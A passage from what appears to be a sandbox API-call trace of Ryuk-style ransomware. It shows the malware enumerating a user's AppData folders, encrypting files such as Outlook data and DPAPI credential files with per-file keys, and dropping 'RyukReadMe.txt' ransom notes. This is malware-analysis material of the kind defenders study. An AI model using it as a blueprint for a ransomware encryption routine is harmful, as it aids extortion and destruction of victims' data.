lpNumberOfBytesWritten=0x29ab8d0*=0xa10, lpOverlapped=0x0) returned 1 [0149.948] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0149.948] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0149.948] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0149.948] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0149.948] CloseHandle (hObject=0x194) returned 1 [0149.975] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0149.979] CryptDestroyKey (hKey=0x3b8690) returned 1 [0149.979] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0149.980] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0149.980] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0149.980] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml", dwFileAttributes=0x80) returned 1 [0149.980] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0149.980] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=2466) returned 1 [0149.980] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=2466) returned 1 [0149.981] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x880, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.981] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0149.982] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.982] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0149.982] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0149.982] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.982] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x9a2, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x9a2, lpOverlapped=0x0) returned 1 [0149.982] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0149.982] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x9a2, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x9b0) returned 1 [0149.982] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.982] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x9b0, lpOverlapped=0x0) returned 1 [0149.982] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0149.983] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0149.983] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0149.983] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0149.983] CloseHandle (hObject=0x194) returned 1 [0150.003] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.007] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.007] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.007] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0150.008] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0150.008] SetLastError (dwErrCode=0x0) [0150.008] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0150.008] GetLastError () returned 0x0 [0150.008] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0150.009] CloseHandle (hObject=0x190) returned 1 [0150.009] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0150.009] SetLastError (dwErrCode=0x0) [0150.009] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0150.009] GetLastError () returned 0xb7 [0150.009] CloseHandle (hObject=0x190) returned 1 [0150.009] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0150.010] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0150.010] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0150.010] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0150.011] SetLastError (dwErrCode=0x0) [0150.011] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\powerpoint\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0150.011] GetLastError () returned 0x0 [0150.011] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0150.012] CloseHandle (hObject=0x190) returned 1 [0150.012] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0150.012] SetLastError (dwErrCode=0x0) [0150.012] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0150.012] GetLastError () returned 0xb7 [0150.012] CloseHandle (hObject=0x190) returned 1 [0150.012] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0150.013] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0150.013] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0150.013] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0150.013] SetLastError (dwErrCode=0x0) [0150.013] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\proof\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0150.013] GetLastError () returned 0x0 [0150.013] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0150.014] CloseHandle (hObject=0x190) returned 1 [0150.014] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0150.014] SetLastError (dwErrCode=0x0) [0150.014] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0150.014] GetLastError () returned 0xb7 [0150.014] CloseHandle (hObject=0x190) returned 1 [0150.014] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0150.015] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0150.015] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0150.015] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.015] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST", dwFileAttributes=0x80) returned 1 [0150.015] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\credhist"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0150.015] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=168) returned 1 [0150.015] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=168) returned 1 [0150.015] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0150.015] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.015] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.015] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0xa8, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0xa8, lpOverlapped=0x0) returned 1 [0150.016] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0150.016] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xa8, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xb0) returned 1 [0150.016] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.016] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0xb0, lpOverlapped=0x0) returned 1 [0150.016] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0150.016] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0150.016] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0150.017] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0150.017] CloseHandle (hObject=0x194) returned 1 [0150.033] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.038] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.038] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.038] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0150.038] SetLastError (dwErrCode=0x0) [0150.038] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0150.039] GetLastError () returned 0x0 [0150.039] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0150.040] CloseHandle (hObject=0x194) returned 1 [0150.040] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0150.042] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0150.043] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0150.043] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.043] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", dwFileAttributes=0x80) returned 1 [0150.043] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0150.044] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=468) returned 1 [0150.044] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=468) returned 1 [0150.044] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xb2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.044] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0150.045] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.045] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0150.045] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.045] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.047] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1d4, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1d4, lpOverlapped=0x0) returned 1 [0150.047] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0150.047] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1d4, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1e0) returned 1 [0150.047] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.047] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1e0, lpOverlapped=0x0) returned 1 [0150.047] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0150.047] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0150.047] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0150.048] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0150.048] CloseHandle (hObject=0x198) returned 1 [0150.064] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.068] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.068] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.068] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0150.068] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.068] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred", dwFileAttributes=0x80) returned 1 [0150.070] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0150.070] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=24) returned 1 [0150.070] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=24) returned 1 [0150.070] CloseHandle (hObject=0x198) returned 1 [0150.070] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.070] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0150.070] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0150.070] SetLastError (dwErrCode=0x0) [0150.070] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0150.071] GetLastError () returned 0x0 [0150.071] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0150.071] CloseHandle (hObject=0x194) returned 1 [0150.072] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0150.072] SetLastError (dwErrCode=0x0) [0150.072] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0150.072] GetLastError () returned 0xb7 [0150.072] CloseHandle (hObject=0x194) returned 1 [0150.072] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0150.072] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0150.072] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0150.072] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.072] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c", dwFileAttributes=0x80) returned 1 [0150.074] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0150.074] GetFileSizeEx (in: hFile=0x198, 